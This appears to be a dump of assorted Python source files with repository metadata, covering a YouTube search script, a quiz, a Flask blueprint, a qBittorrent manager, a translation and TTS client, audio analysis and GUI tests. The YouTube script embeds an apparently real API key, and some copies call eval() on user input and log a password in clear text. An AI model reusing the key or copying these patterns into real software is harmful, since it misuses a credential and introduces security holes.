            videos.append("https://www.youtube.com/watch?v={0}".format(item_id['videoId']))
    return videos
if __name__ == '__main__':
    # Smoke test: print up to 50 search results for the "happy" mood.
    try:
        print(mood_eval_youtube("happy", 50))
    except HttpError as e:
        print ('An HTTP error %d occurred:\n%s' % (e.resp.status, e.content))
| 31.676471 | 78 | 0.662024 |
import argparse
import logging
import json
import random
from pprint import pprint
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
DEVELOPER_KEY = 'AIzaSyCEGv-JQcjMIdpXYO9eIhAGWKLJn1XzXos'
YOUTUBE_API_SERVICE_NAME = 'youtube'
YOUTUBE_API_VERSION = 'v3'
def mood_eval_youtube(keyword, limit):
youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
developerKey = DEVELOPER_KEY)
search_response = youtube.search().list(q=keyword, part='id,snippet',
maxResults=limit)
search_response = search_response.execute()
videos = []
for search_result in search_response.get('items', []):
if search_result['id']['kind'] == 'youtube#video':
video_id = search_result['id']['videoId']
video_url = "https://www.youtube.com/watch?v={0}".format(video_id)
videos.append(video_url)
return videos
if __name__ == '__main__':
try:
print(mood_eval_youtube("happy", 50))
except HttpError as e:
print ('An HTTP error %d occurred:\n%s' % (e.resp.status, e.content))
| true | true |
f7236bf981d8e58994d8ce22e596355b1031db97 | 619 | py | Python | examples/SubtractionQuiz.py | Ellis0817/Introduction-to-Programming-Using-Python | 1882a2a846162d5ff56d4d56c3940b638ef408bd | [
"MIT"
] | null | null | null | examples/SubtractionQuiz.py | Ellis0817/Introduction-to-Programming-Using-Python | 1882a2a846162d5ff56d4d56c3940b638ef408bd | [
"MIT"
] | 4 | 2019-11-07T12:32:19.000Z | 2020-07-19T14:04:44.000Z | examples/SubtractionQuiz.py | Ellis0817/Introduction-to-Programming-Using-Python | 1882a2a846162d5ff56d4d56c3940b638ef408bd | [
"MIT"
] | 5 | 2019-12-04T15:56:55.000Z | 2022-01-14T06:19:18.000Z | import random
# 1. Generate two random single-digit integers
number1 = random.randint(0, 9)
number2 = random.randint(0, 9)

# 2. If number1 < number2, swap them so the difference is non-negative
if number1 < number2:
    number1, number2 = number2, number1  # Simultaneous assignment

# 3. Prompt the student to answer "what is number1 - number2?"
# Fix: int() instead of eval() -- eval() executes arbitrary expressions
# typed by the user, which is both a security hole and fragile.
answer = int(input("What is " + str(number1) + " - " +
                   str(number2) + "? "))

# 4. Grade the answer and display the result
if number1 - number2 == answer:
    print("You are correct!")
else:
    print("Your answer is wrong.\n", number1, "-",
          number2, "is", number1 - number2)
number1 = random.randint(0, 9)
number2 = random.randint(0, 9)
if number1 < number2:
number1, number2 = number2, number1
answer = eval(input("What is " + str(number1) + " - " +
str(number2) + "? "))
if number1 - number2 == answer:
print("You are correct!")
else:
print("Your answer is wrong.\n", number1, "-",
number2, "is", number1 - number2) | true | true |
f7236c1d24ebc9967824ee1d78fb2ee142ab6125 | 819 | py | Python | app/main/view.py | fauziwei/_flask_ | a2e8ed2f459df289945fa7942b23e9e02da63bb8 | [
"Apache-2.0"
] | null | null | null | app/main/view.py | fauziwei/_flask_ | a2e8ed2f459df289945fa7942b23e9e02da63bb8 | [
"Apache-2.0"
] | null | null | null | app/main/view.py | fauziwei/_flask_ | a2e8ed2f459df289945fa7942b23e9e02da63bb8 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
'''Fauzi, fauzi@soovii.com'''
from flask import Blueprint, request
from flask_restful import Api, reqparse
from app.view import Resource
from app.model import db
# from app.main.model import Main
from sqlalchemy.exc import SQLAlchemyError
from log import logger
mainBlueprint = Blueprint('main', __name__)
api = Api(mainBlueprint)
parser = reqparse.RequestParser()
parser.add_argument('id', type=int)
class Index(Resource):
    """Root resource of the main blueprint (mounted at ``/`` and ``/main/``)."""

    # Get something
    # curl -i http://localhost:5555/
    def get(self):
        # Simple liveness/status check.
        logger.debug('main is accessed.')
        return { 'status': True }

    # Create something
    def post(self):
        # NOTE(review): stub -- arguments are parsed but nothing is created
        # yet; the handler implicitly returns None.
        args = parser.parse_args()

    # Update something
    def put(self):
        # NOTE(review): stub -- parses arguments only.
        args = parser.parse_args()

    # Delete something
    def delete(self):
        # NOTE(review): stub -- parses arguments only.
        args = parser.parse_args()
api.add_resource(Index, '/', '/main/')
| 20.475 | 43 | 0.726496 |
from flask import Blueprint, request
from flask_restful import Api, reqparse
from app.view import Resource
from app.model import db
from sqlalchemy.exc import SQLAlchemyError
from log import logger
mainBlueprint = Blueprint('main', __name__)
api = Api(mainBlueprint)
parser = reqparse.RequestParser()
parser.add_argument('id', type=int)
class Index(Resource):
def get(self):
logger.debug('main is accessed.')
return { 'status': True }
def post(self):
args = parser.parse_args()
def put(self):
args = parser.parse_args()
def delete(self):
args = parser.parse_args()
api.add_resource(Index, '/', '/main/')
| true | true |
f7236d2aab05f1b600372b63dd82fbd77d8921b1 | 2,531 | py | Python | qBitrr/main.py | Treverr/Qbitrr | 5d781b2180e1070663748e9948c7ba95d5594747 | [
"MIT"
] | null | null | null | qBitrr/main.py | Treverr/Qbitrr | 5d781b2180e1070663748e9948c7ba95d5594747 | [
"MIT"
] | null | null | null | qBitrr/main.py | Treverr/Qbitrr | 5d781b2180e1070663748e9948c7ba95d5594747 | [
"MIT"
] | null | null | null | from typing import NoReturn
import logbook
import qbittorrentapi
import requests
from qbittorrentapi import APINames, login_required, response_text
from .arss import ArrManager
from .config import CONFIG
from .logger import *
logger = logbook.Logger("qBitManager")

# QBitTorrent Config Values
qBit_Host = CONFIG.get("QBit", "Host", fallback="localhost")
qBit_Port = CONFIG.getint("QBit", "Port")
qBit_UserName = CONFIG.get("QBit", "UserName")
qBit_Password = CONFIG.get("QBit", "Password", fallback=None)
# SECURITY fix: the original debug line wrote the real password to the log
# in clear text.  Log only whether a password is configured.
logger.debug(
    "QBitTorrent Config: Host: {qBit_Host}, Port: {qBit_Port}, Username: {qBit_UserName}, "
    "Password: {qBit_Password}",
    qBit_Host=qBit_Host,
    qBit_Port=qBit_Port,
    qBit_UserName=qBit_UserName,
    qBit_Password="<set>" if qBit_Password else "<unset>",
)
class qBitManager:
    """Owns the qBittorrent Web API client and the managed Arr instances."""

    def __init__(self):
        # Client built from the module-level QBit config values.
        self.client = qbittorrentapi.Client(
            host=qBit_Host,
            port=qBit_Port,
            username=qBit_UserName,
            password=qBit_Password,
            SIMPLE_RESPONSES=False,
        )
        self.arr_manager = ArrManager(self).build_arr_instances()
        self.logger = logger
        self.cache = dict()
        self.name_cache = dict()
        self.should_delay_torrent_scan = False  # If true torrent scan is delayed by 5 minutes.
        self.child_processes = []

    @response_text(str)
    @login_required
    def app_version(self, **kwargs):
        """Fetch the qBittorrent application version string.

        Uses the client's private ``_get`` so retries can be forced to
        zero (unlike the public ``app_version`` helper).
        """
        return self.client._get(
            _name=APINames.Application,
            _method="version",
            _retries=0,
            _retry_backoff_factor=0,
            **kwargs,
        )

    @property
    def is_alive(self) -> bool:
        """True if the qBittorrent Web API answers.

        On connection failure also sets ``should_delay_torrent_scan``.
        """
        try:
            self.client.app_version()
            self.logger.trace(
                "Successfully connected to {url}:{port}", url=qBit_Host, port=qBit_Port
            )
            return True
        except requests.RequestException:
            self.logger.warning("Could not connect to {url}:{port}", url=qBit_Host, port=qBit_Port)
            self.should_delay_torrent_scan = True
            return False

    def run(self) -> NoReturn:
        """Spawn every managed Arr's child processes and block on them."""
        for arr in self.arr_manager.managed_objects.values():
            arr.spawn_child_processes()
        for p in self.child_processes:
            p.join()
def run():
    """Entry point: build the manager, run it, always clean up children."""
    qbit_manager = qBitManager()
    try:
        qbit_manager.run()
    finally:
        # Never leave orphaned worker processes behind on shutdown.
        logger.notice("Terminating child processed, please wait a moment.")
        for worker in qbit_manager.child_processes:
            worker.terminate()


if __name__ == "__main__":
    run()
| 28.122222 | 99 | 0.638483 | from typing import NoReturn
import logbook
import qbittorrentapi
import requests
from qbittorrentapi import APINames, login_required, response_text
from .arss import ArrManager
from .config import CONFIG
from .logger import *
logger = logbook.Logger("qBitManager")
qBit_Host = CONFIG.get("QBit", "Host", fallback="localhost")
qBit_Port = CONFIG.getint("QBit", "Port")
qBit_UserName = CONFIG.get("QBit", "UserName")
qBit_Password = CONFIG.get("QBit", "Password", fallback=None)
logger.debug(
"QBitTorrent Config: Host: {qBit_Host}, Port: {qBit_Port}, Username: {qBit_UserName}, "
"Password: {qBit_Password}",
qBit_Host=qBit_Host,
qBit_Port=qBit_Port,
qBit_UserName=qBit_UserName,
qBit_Password=qBit_Password,
)
class qBitManager:
def __init__(self):
self.client = qbittorrentapi.Client(
host=qBit_Host,
port=qBit_Port,
username=qBit_UserName,
password=qBit_Password,
SIMPLE_RESPONSES=False,
)
self.arr_manager = ArrManager(self).build_arr_instances()
self.logger = logger
self.cache = dict()
self.name_cache = dict()
self.should_delay_torrent_scan = False
self.child_processes = []
@response_text(str)
@login_required
def app_version(self, **kwargs):
return self.client._get(
_name=APINames.Application,
_method="version",
_retries=0,
_retry_backoff_factor=0,
**kwargs,
)
@property
def is_alive(self) -> bool:
try:
self.client.app_version()
self.logger.trace(
"Successfully connected to {url}:{port}", url=qBit_Host, port=qBit_Port
)
return True
except requests.RequestException:
self.logger.warning("Could not connect to {url}:{port}", url=qBit_Host, port=qBit_Port)
self.should_delay_torrent_scan = True
return False
def run(self) -> NoReturn:
for arr in self.arr_manager.managed_objects.values():
arr.spawn_child_processes()
for p in self.child_processes:
p.join()
def run():
manager = qBitManager()
try:
manager.run()
finally:
logger.notice("Terminating child processed, please wait a moment.")
for child in manager.child_processes:
child.terminate()
if __name__ == "__main__":
run()
| true | true |
f7236d3fcab67683773e445ba66effeb0a887648 | 7,422 | py | Python | src/client.py | Shandilya21/oratio | 53a77404df35a6b2b73c6a74a0e40d3f8747c408 | [
"BSD-3-Clause"
] | null | null | null | src/client.py | Shandilya21/oratio | 53a77404df35a6b2b73c6a74a0e40d3f8747c408 | [
"BSD-3-Clause"
] | null | null | null | src/client.py | Shandilya21/oratio | 53a77404df35a6b2b73c6a74a0e40d3f8747c408 | [
"BSD-3-Clause"
] | null | null | null | import enum
import json
from target_voice import create_voice, gender_string
import api.stt.util
class Provider(enum.Enum):
    """Cloud backend selectable per pipeline stage (storage/STT/translate/TTS)."""
    GCLOUD = 1
    AWS = 2
    AWS_DEEPL = 3  # AWS for storage/STT/TTS, DeepL for translation
class Client:
    """Pipeline facade: upload audio, transcribe, translate and synthesize.

    The concrete backend modules are chosen per stage from the ``Provider``
    values and imported lazily in ``setup_clients``.
    """

    def __init__(
        self,
        upload_filename,
        stt_provider=Provider.GCLOUD,
        translate_provider=Provider.GCLOUD,
        tts_provider=Provider.GCLOUD,
        gcloud_speedup=False,  # temporary flag
        gender=None,
    ):
        self.upload_filename = upload_filename
        self.stt_provider = stt_provider
        self.translate_provider = translate_provider
        self.tts_provider = tts_provider
        self.setup_clients()
        self.gcloud_speedup = gcloud_speedup
        self.gender = gender

    def setup_clients(self):
        """Import the backend modules for the chosen providers and build
        their API clients.

        NOTE(review): DeepL has no client object, hence the special case
        below that skips ``translate.get_client()`` for AWS_DEEPL.
        """
        if self.stt_provider == Provider.GCLOUD:
            from api.storage import gcloud_storage as storage
            from api.stt import gcloud_stt as stt
        if self.translate_provider == Provider.GCLOUD:
            from api.translate import gcloud_translate as translate
        if self.tts_provider == Provider.GCLOUD:
            from api.tts import gcloud_tts as tts
        if self.stt_provider == Provider.AWS:
            from api.storage import aws_storage as storage
            from api.stt import aws_stt as stt
        if self.translate_provider == Provider.AWS:
            from api.translate import aws_translate as translate
        if self.tts_provider == Provider.AWS:
            from api.tts import aws_tts as tts
        if self.stt_provider == Provider.AWS_DEEPL:
            from api.storage import aws_storage as storage
            from api.stt import aws_stt as stt
        if self.translate_provider == Provider.AWS_DEEPL:
            from api.translate import deepl_translate as translate
        if self.tts_provider == Provider.AWS_DEEPL:
            from api.tts import aws_tts as tts
        self.storage = storage
        self.stt = stt
        self.translate = translate
        self.tts = tts
        self.storage_client = storage.get_client()
        self.stt_client = stt.get_client()
        if not self.translate_provider == Provider.AWS_DEEPL:
            self.translate_client = translate.get_client()
        self.tts_client = tts.get_client()
        # Cache of chosen voice per locale, filled on demand.
        self.target_voices = {}

    # input_file should be a complete path
    def upload_file_to_cloud(self, input_file):
        """Upload *input_file* to cloud storage as ``self.upload_filename``."""
        self.storage.upload_file_to_cloud(
            self.storage_client, input_file, self.upload_filename
        )

    def transcribe_sentences(self, locale):
        """Transcribe the uploaded audio and group the words into sentences."""
        response = self.stt.transcribe_storage_uri(
            self.stt_client, self.upload_filename, locale
        )
        word_list = self.stt.get_word_list(response)
        return api.stt.util.create_sentences_from_word_list(word_list, locale)

    def get_translation(self, original_text, target_language):
        """Translate *original_text* into *target_language* via the
        configured backend (DeepL takes no client argument)."""
        if not self.translate_provider == Provider.AWS_DEEPL:
            return self.translate.get_translation(
                self.translate_client, original_text, target_language
            )
        else:
            return self.translate.get_translation(original_text, target_language)

    def get_target_voice(self, locale, gender):
        """Interactively pick a TTS voice for *locale* matching the
        client's gender; returns None when the backend lists no voices."""
        response = self.tts.list_voices(self.tts_client, locale)
        voices = self.tts.normalize_voices(response)
        # find the best matches
        options = [
            v for v in voices if (v.gender == self.gender and v.locale == locale)
        ]
        if voices == []:
            # TODO add error handling
            return None
        if options == []:
            print("Couldn't find a matching voice.")
            return voices[0]
        # if there is only one option, there is no option
        if len(options) == 1:
            return options[0]
        # Several candidates: let the user pick one on the console.
        print(f"Options for {gender_string(gender)} - {locale}")
        for idx, voice in enumerate(options):
            print(f"#{idx} - {voice.name}")
        choice = input(
            f"Choose a voice by entering a number between 0:{len(options)-1} [Default: 0]: "
        )
        if choice.strip() == "":
            choice = 0
        return options[int(choice)]

    def get_audio_chunk_for_sentence(self, text, locale, speedup=1.0):
        """Synthesize *text* in *locale*, choosing (and optionally saving)
        the voice on first use.  ``speedup`` is honoured by gcloud only."""
        if locale not in self.target_voices:
            self.target_voices[locale] = self.get_target_voice(locale, self.gender)
            print(self.target_voices[locale])
            update_best_voices = input(
                "Would you like to update the best voices file? (y/N) "
            )
            if update_best_voices == "y":
                self.save_best_voices()
        if self.tts_provider == Provider.GCLOUD:
            return self.tts.get_audio_chunk_for_sentence(
                self.tts_client, text, self.target_voices[locale], speedup=speedup
            )
        else:
            return self.tts.get_audio_chunk_for_sentence(
                self.tts_client, text, self.target_voices[locale]
            )

    # Returns a list of voices which match the gender of the client
    def get_all_matching_voices(self):
        """All gender-matching voices whose language is also translatable."""
        response = self.tts.list_voices(self.tts_client)
        voices = self.tts.normalize_voices(response)
        translation_lang_codes = self.translate.get_supported_languages(
            self.translate_client
        )
        # don't synthesize if the translation doesn't exist
        broken = []
        for v in voices:
            if v.lang_code not in translation_lang_codes:
                broken.append(v.locale)
        return [
            v for v in voices if (v.gender == self.gender and v.locale not in broken)
        ]

    def load_best_voices(self, voices_file, target_locales):
        """Pre-populate ``target_voices`` from a JSON file of saved picks."""
        # json will have the following structure
        # { gender: {
        #     "AWS" : {
        #         locale : voiceId
        #          ...
        #     },
        #     "gcloud" : {
        #         locale : name
        #          ...
        #     },
        #   }
        # }
        self.voices_file = voices_file
        with open(voices_file) as f:
            voices = json.load(f)
        provider = self.tts.provider_name()
        gender = gender_string(self.gender)
        if gender not in voices or provider not in voices[gender]:
            return
        for locale, name in voices[gender][
            provider
        ].items():  # this should be a list of locale : name
            if provider == "AWS":
                self.target_voices[locale] = create_voice(
                    locale, self.gender, voiceId=name
                )
            if provider == "gcloud":
                self.target_voices[locale] = create_voice(
                    locale, self.gender, gcloud_name=name
                )
            if locale in target_locales:
                print(self.target_voices[locale])

    def save_best_voices(self):
        """Write the currently chosen voices back into the voices JSON file."""
        with open(self.voices_file) as f:
            voices = json.load(f)
        provider = self.tts.provider_name()
        gender = gender_string(self.gender)
        if gender not in voices:
            voices[gender] = {}
        if provider not in voices[gender]:
            voices[gender][provider] = {}
        for locale, voice in self.target_voices.items():
            voices[gender][provider][locale] = voice.name
        with open(self.voices_file, "w") as w:
            w.write(json.dumps(voices, indent=2))
| 34.202765 | 92 | 0.597683 | import enum
import json
from target_voice import create_voice, gender_string
import api.stt.util
class Provider(enum.Enum):
GCLOUD = 1
AWS = 2
AWS_DEEPL = 3
class Client:
def __init__(
self,
upload_filename,
stt_provider=Provider.GCLOUD,
translate_provider=Provider.GCLOUD,
tts_provider=Provider.GCLOUD,
gcloud_speedup=False,
gender=None,
):
self.upload_filename = upload_filename
self.stt_provider = stt_provider
self.translate_provider = translate_provider
self.tts_provider = tts_provider
self.setup_clients()
self.gcloud_speedup = gcloud_speedup
self.gender = gender
def setup_clients(self):
if self.stt_provider == Provider.GCLOUD:
from api.storage import gcloud_storage as storage
from api.stt import gcloud_stt as stt
if self.translate_provider == Provider.GCLOUD:
from api.translate import gcloud_translate as translate
if self.tts_provider == Provider.GCLOUD:
from api.tts import gcloud_tts as tts
if self.stt_provider == Provider.AWS:
from api.storage import aws_storage as storage
from api.stt import aws_stt as stt
if self.translate_provider == Provider.AWS:
from api.translate import aws_translate as translate
if self.tts_provider == Provider.AWS:
from api.tts import aws_tts as tts
if self.stt_provider == Provider.AWS_DEEPL:
from api.storage import aws_storage as storage
from api.stt import aws_stt as stt
if self.translate_provider == Provider.AWS_DEEPL:
from api.translate import deepl_translate as translate
if self.tts_provider == Provider.AWS_DEEPL:
from api.tts import aws_tts as tts
self.storage = storage
self.stt = stt
self.translate = translate
self.tts = tts
self.storage_client = storage.get_client()
self.stt_client = stt.get_client()
if not self.translate_provider == Provider.AWS_DEEPL:
self.translate_client = translate.get_client()
self.tts_client = tts.get_client()
self.target_voices = {}
def upload_file_to_cloud(self, input_file):
self.storage.upload_file_to_cloud(
self.storage_client, input_file, self.upload_filename
)
def transcribe_sentences(self, locale):
response = self.stt.transcribe_storage_uri(
self.stt_client, self.upload_filename, locale
)
word_list = self.stt.get_word_list(response)
return api.stt.util.create_sentences_from_word_list(word_list, locale)
def get_translation(self, original_text, target_language):
if not self.translate_provider == Provider.AWS_DEEPL:
return self.translate.get_translation(
self.translate_client, original_text, target_language
)
else:
return self.translate.get_translation(original_text, target_language)
def get_target_voice(self, locale, gender):
response = self.tts.list_voices(self.tts_client, locale)
voices = self.tts.normalize_voices(response)
options = [
v for v in voices if (v.gender == self.gender and v.locale == locale)
]
if voices == []:
return None
if options == []:
print("Couldn't find a matching voice.")
return voices[0]
# if there is only one option, there is no option
if len(options) == 1:
return options[0]
print(f"Options for {gender_string(gender)} - {locale}")
for idx, voice in enumerate(options):
print(f"#{idx} - {voice.name}")
choice = input(
f"Choose a voice by entering a number between 0:{len(options)-1} [Default: 0]: "
)
if choice.strip() == "":
choice = 0
return options[int(choice)]
def get_audio_chunk_for_sentence(self, text, locale, speedup=1.0):
if locale not in self.target_voices:
self.target_voices[locale] = self.get_target_voice(locale, self.gender)
print(self.target_voices[locale])
update_best_voices = input(
"Would you like to update the best voices file? (y/N) "
)
if update_best_voices == "y":
self.save_best_voices()
if self.tts_provider == Provider.GCLOUD:
return self.tts.get_audio_chunk_for_sentence(
self.tts_client, text, self.target_voices[locale], speedup=speedup
)
else:
return self.tts.get_audio_chunk_for_sentence(
self.tts_client, text, self.target_voices[locale]
)
# Returns a list of voices which match the gender of the client
def get_all_matching_voices(self):
response = self.tts.list_voices(self.tts_client)
voices = self.tts.normalize_voices(response)
translation_lang_codes = self.translate.get_supported_languages(
self.translate_client
)
# don't synthesize if the translation doesn't exist
broken = []
for v in voices:
if v.lang_code not in translation_lang_codes:
broken.append(v.locale)
return [
v for v in voices if (v.gender == self.gender and v.locale not in broken)
]
def load_best_voices(self, voices_file, target_locales):
# json will have the following structure
# { gender: {
# "AWS" : {
# locale : voiceId
# ...
# },
# "gcloud" : {
# locale : name
# ...
# },
# }
# }
self.voices_file = voices_file
with open(voices_file) as f:
voices = json.load(f)
provider = self.tts.provider_name()
gender = gender_string(self.gender)
if gender not in voices or provider not in voices[gender]:
return
for locale, name in voices[gender][
provider
].items(): # this should be a list of locale : name
if provider == "AWS":
self.target_voices[locale] = create_voice(
locale, self.gender, voiceId=name
)
if provider == "gcloud":
self.target_voices[locale] = create_voice(
locale, self.gender, gcloud_name=name
)
if locale in target_locales:
print(self.target_voices[locale])
def save_best_voices(self):
with open(self.voices_file) as f:
voices = json.load(f)
provider = self.tts.provider_name()
gender = gender_string(self.gender)
if gender not in voices:
voices[gender] = {}
if provider not in voices[gender]:
voices[gender][provider] = {}
for locale, voice in self.target_voices.items():
voices[gender][provider][locale] = voice.name
with open(self.voices_file, "w") as w:
w.write(json.dumps(voices, indent=2))
| true | true |
f7236d5b15b17c1222fa056d925e9c65b7d75e62 | 2,881 | py | Python | analyser/analysis/pen_calculation_deviation_box_plots.py | michigg/web-simultaneous-recording-tool | 67db83f6e34d9cb726c69b4e448fed3604a43618 | [
"MIT"
] | 1 | 2022-03-30T09:45:25.000Z | 2022-03-30T09:45:25.000Z | analyser/analysis/pen_calculation_deviation_box_plots.py | michigg/web-simultaneous-recording-tool | 67db83f6e34d9cb726c69b4e448fed3604a43618 | [
"MIT"
] | null | null | null | analyser/analysis/pen_calculation_deviation_box_plots.py | michigg/web-simultaneous-recording-tool | 67db83f6e34d9cb726c69b4e448fed3604a43618 | [
"MIT"
] | null | null | null | """
"""
import sys
import numpy as np
import pandas as pd
from scipy.signal import argrelextrema
from analysis.frog_click_mean_calculation import calc_click_mean_quantil_based
from utils import dataframe_index, audio_calcs
from utils.data_exporter import Exporter
from utils.data_loader import Loader
import logging
from utils.output import Output
# INPUT_DEVICES = '/home/michigg/GIT/uni/2021-ma-michael-goetz-data/PensCalibration/Test2/Converted/devices-1-aggregated-dbas-distance_0m-device.pkl'
INPUT_DEVICES = '/home/michigg/GIT/uni/2021-ma-michael-goetz-data/PensCalibration/Test2/Converted/devices-1-aggregated-dbas.pkl'
OUTPUT_DIR = '/home/michigg/GIT/uni/2021-ma-michael-goetz-data/PensCalibration/Test2/Graphs/Calculations/BoxPlots'
logger = logging.getLogger(__name__)
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s [%(levelname)s]:\n %(message)s",
handlers=[
logging.FileHandler(f"{OUTPUT_DIR}/analyse.log", mode='w'),
logging.StreamHandler(sys.stdout)
]
)
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
def main():
    """Compute per-pen standard deviations for each calculation method and
    render them as one box plot."""
    devices = Loader.load_analysis_from_pickle(INPUT_DEVICES)
    sample_rate = dataframe_index.get_sample_rate(devices)
    buffer_size = dataframe_index.get_buffer_size(devices)

    def deviation_column(values, label):
        # Spread the PenId level into columns, take the std across pens,
        # and name the resulting single column after the method.
        column = values.unstack('PenId').std(axis=1).to_frame()
        column.columns = [label]
        return column

    columns = []
    # Method 1: global maximum per recording.
    columns.append(
        deviation_column(audio_calcs.calculate_global_max(devices), 'global max')
    )
    # Method 2: quantile based click mean.
    quantile_values = devices.apply(
        calc_click_mean_quantil_based,
        axis=1,
        sample_rate=sample_rate,
        buffer_size=buffer_size,
        db_only=True
    ).to_frame()
    columns.append(deviation_column(quantile_values, 'quantile based'))
    # Methods 3-5: global max restricted to a dB(A) range around the peak.
    for db_range in [10, 15, 20]:
        range_values = devices.apply(
            audio_calcs.calc_series_click_mean,
            axis=1,
            sample_rate=sample_rate,
            buffer_size=buffer_size,
            db_range=db_range,
            return_maxima=False
        ).to_frame()
        columns.append(
            deviation_column(range_values, f'{db_range} dB(A) range global max')
        )

    results = pd.concat(columns, axis=1)
    logger.info(results)
    Output.box_plot(
        '',
        # f'Deviations In dB(A) Between Frogs By Calculation Method',
        results,
        file_path=f'{OUTPUT_DIR}',
        file_name=f'box-plot-calculation-methods',
        ignore_clean=True,
        hide_outliers=True
    )


if __name__ == '__main__':
    main()
| 30.326316 | 149 | 0.695245 | import sys
import numpy as np
import pandas as pd
from scipy.signal import argrelextrema
from analysis.frog_click_mean_calculation import calc_click_mean_quantil_based
from utils import dataframe_index, audio_calcs
from utils.data_exporter import Exporter
from utils.data_loader import Loader
import logging
from utils.output import Output
INPUT_DEVICES = '/home/michigg/GIT/uni/2021-ma-michael-goetz-data/PensCalibration/Test2/Converted/devices-1-aggregated-dbas.pkl'
OUTPUT_DIR = '/home/michigg/GIT/uni/2021-ma-michael-goetz-data/PensCalibration/Test2/Graphs/Calculations/BoxPlots'
logger = logging.getLogger(__name__)
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s [%(levelname)s]:\n %(message)s",
handlers=[
logging.FileHandler(f"{OUTPUT_DIR}/analyse.log", mode='w'),
logging.StreamHandler(sys.stdout)
]
)
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
def main():
devices = Loader.load_analysis_from_pickle(INPUT_DEVICES)
sample_rate = dataframe_index.get_sample_rate(devices)
buffer_size = dataframe_index.get_buffer_size(devices)
dataframes = []
result = audio_calcs.calculate_global_max(devices)
result = result.unstack('PenId')
result = result.std(axis=1).to_frame()
result.columns = ['global max']
dataframes.append(result)
result = devices.apply(
calc_click_mean_quantil_based,
axis=1,
sample_rate=sample_rate,
buffer_size=buffer_size,
db_only=True
).to_frame()
result = result.unstack('PenId')
result = result.std(axis=1).to_frame()
result.columns = ['quantile based']
dataframes.append(result)
for db_range in [10, 15, 20]:
result = devices.apply(
audio_calcs.calc_series_click_mean,
axis=1,
sample_rate=sample_rate,
buffer_size=buffer_size,
db_range=db_range,
return_maxima=False
).to_frame()
result = result.unstack('PenId')
result = result.std(axis=1).to_frame()
result.columns = [f'{db_range} dB(A) range global max']
dataframes.append(result)
results = pd.concat(dataframes, axis=1)
logger.info(results)
Output.box_plot(
'',
results,
file_path=f'{OUTPUT_DIR}',
file_name=f'box-plot-calculation-methods',
ignore_clean=True,
hide_outliers=True
)
if __name__ == '__main__':
main()
| true | true |
f7236dd43c0f9b521cc15880e1ba140ac3804e61 | 10,414 | py | Python | mslib/msui/_tests/test_mscolab_admin_window.py | iamansoni/MSS | 69bc8fc61ab277697ca691119f911382a63860c0 | [
"Apache-2.0"
] | null | null | null | mslib/msui/_tests/test_mscolab_admin_window.py | iamansoni/MSS | 69bc8fc61ab277697ca691119f911382a63860c0 | [
"Apache-2.0"
] | null | null | null | mslib/msui/_tests/test_mscolab_admin_window.py | iamansoni/MSS | 69bc8fc61ab277697ca691119f911382a63860c0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
mslib.msui._tests.test_mscolab_project
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module is used to test mscolab-project related gui.
This file is part of mss.
:copyright: Copyright 2019 Shivashis Padhi
:copyright: Copyright 2019-2020 by the mss team, see AUTHORS.
:license: APACHE-2.0, see LICENSE for details.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import time
from mslib.msui.mscolab import MSSMscolabWindow
from mslib._tests.constants import MSCOLAB_URL_TEST
from mslib.mscolab.conf import mscolab_settings
from mslib.mscolab.server import APP, db, initialize_managers
from PyQt5 import QtCore, QtTest, QtWidgets
class Test_MscolabAdminWindow(object):
    def setup(self):
        """
        Build the Flask app + managers, open the Mscolab window, log in,
        activate the first project and open its admin window.

        User being used during test: id = 5, username = test1
        """
        self.app = APP
        self.app.config['SQLALCHEMY_DATABASE_URI'] = mscolab_settings.SQLALCHEMY_DB_URI
        self.app.config['MSCOLAB_DATA_DIR'] = mscolab_settings.MSCOLAB_DATA_DIR
        self.app, _, cm, fm = initialize_managers(self.app)
        self.fm = fm
        self.cm = cm
        db.init_app(self.app)
        self.application = QtWidgets.QApplication(sys.argv)
        self.window = MSSMscolabWindow(data_dir=mscolab_settings.MSCOLAB_DATA_DIR,
                                       mscolab_server_url=MSCOLAB_URL_TEST)
        self._login()
        self._activate_project_at_index(0)
        # Open the admin window for the activated project.
        QtTest.QTest.mouseClick(self.window.adminWindowBtn, QtCore.Qt.LeftButton)
        QtWidgets.QApplication.processEvents()
        self.admin_window = self.window.admin_window
        QtTest.QTest.qWaitForWindowExposed(self.window)
        QtWidgets.QApplication.processEvents()
    def teardown(self):
        """Close windows and drop the socket connection after each test."""
        # to disconnect connections, and clear token
        # Not logging out since it pops up a dialog
        # self.window.logout()
        if self.window.admin_window:
            self.window.admin_window.close()
        if self.window.conn:
            self.window.conn.disconnect()
        self.window.close()
        QtWidgets.QApplication.processEvents()
        self.application.quit()
        QtWidgets.QApplication.processEvents()
    def test_permission_filter(self):
        """The permission combo box filters rows of the modify-users table."""
        len_added_users = self.admin_window.modifyUsersTable.rowCount()
        # Change filter to viewer
        self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("viewer")
        QtWidgets.QApplication.processEvents()
        # Check how many users are visible
        visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
        assert visible_row_count == 1
        # Change it back to all
        self.admin_window.modifyUsersPermissionFilter.currentTextChanged.emit("all")
        QtWidgets.QApplication.processEvents()
        # Check how many rows are visible
        visible_row_count = self._get_visible_row_count(self.admin_window.modifyUsersTable)
        assert visible_row_count == len_added_users
    def test_text_search_filter(self):
        """Typed search text filters both the add-users and modify-users tables."""
        len_unadded_users = self.admin_window.addUsersTable.rowCount()
        len_added_users = self.admin_window.modifyUsersTable.rowCount()
        # Text Search in add users Table
